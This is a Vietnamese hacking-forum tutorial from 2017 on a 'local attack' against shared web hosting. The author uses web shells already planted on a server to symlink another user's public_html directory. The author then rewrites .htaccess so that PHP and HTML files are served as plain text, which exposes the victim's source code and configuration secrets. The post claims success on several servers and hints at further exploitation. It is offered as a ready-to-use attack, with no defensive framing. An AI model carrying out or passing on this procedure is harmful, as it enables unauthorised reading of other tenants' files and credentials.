[TUT] Local Attack - Symlink Directory

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

  1. Mickey

    Mickey Hacking For Hacker Staff Member

    Cái này chắc nhiều người biết roài mà mình chỉ là một newbie nên đối với mình nó còn rất mới mẻ :D đã test thành công trren một vài server của pv nên giờ share lại cho ae chưa biết mong các pro đừng chém :D

    Symlink thì chắc nhiều người biết rồi tuy nhiên lang thang trên mạng đã lâu thì thấy đa số chỉ hướng dẫn symlink file config.php. Hôm nay mình sẽ hướng dẫn các bạn symlink thư mục :D chính là symlink thư mục public_html của victim or bất kỳ thư mục nào cũng được.

    Nguyên liệu:

    - Shell :)) tất nhiên là muốn local thì phải có shell trên server rồi
    - 2 Con shell mình sử dụng trong tut này là: webadmin, cgi

    Rồi bắt đầu thôi

    Đầu tiên chạy shell cgi và run lệnh:

    Mã:
    ln -s /home/user-victim/public_html public_html

    [​IMG]

    rồi vậy là ta đã tạo được symlink tới thư mục public_html của victim


    [​IMG]

    Tiếp theo sửa file htaccess thành:

    Mã:
    Options +FollowSymLinks
    DirectoryIndex cmd.html
    Options +Indexes
    RemoveHandler .hack
    AddType text/plain .hack
    Options Indexes FollowSymLinks
    DirectoryIndex cmd.html
    AddType txt .php
    AddHandler txt .php
    AddType txt .htm
    AddHandler txt .htm
    AddType txt .html
    AddHandler txt .html
    AddType txt .shtml
    AddHandler txt .shtml
    AddType txt .phtml
    AddHandler txt .phtml

    Rồi giờ đọc symlink thôi

    http://domain.com/path/public_html

    [​IMG]


    Đến đây rồi làm gì tiếp theo nữa chắc không cần phải nói nữa :D

    Done. End Tut

    Chúc các bạn local vui vẻ =))
     

Share This Page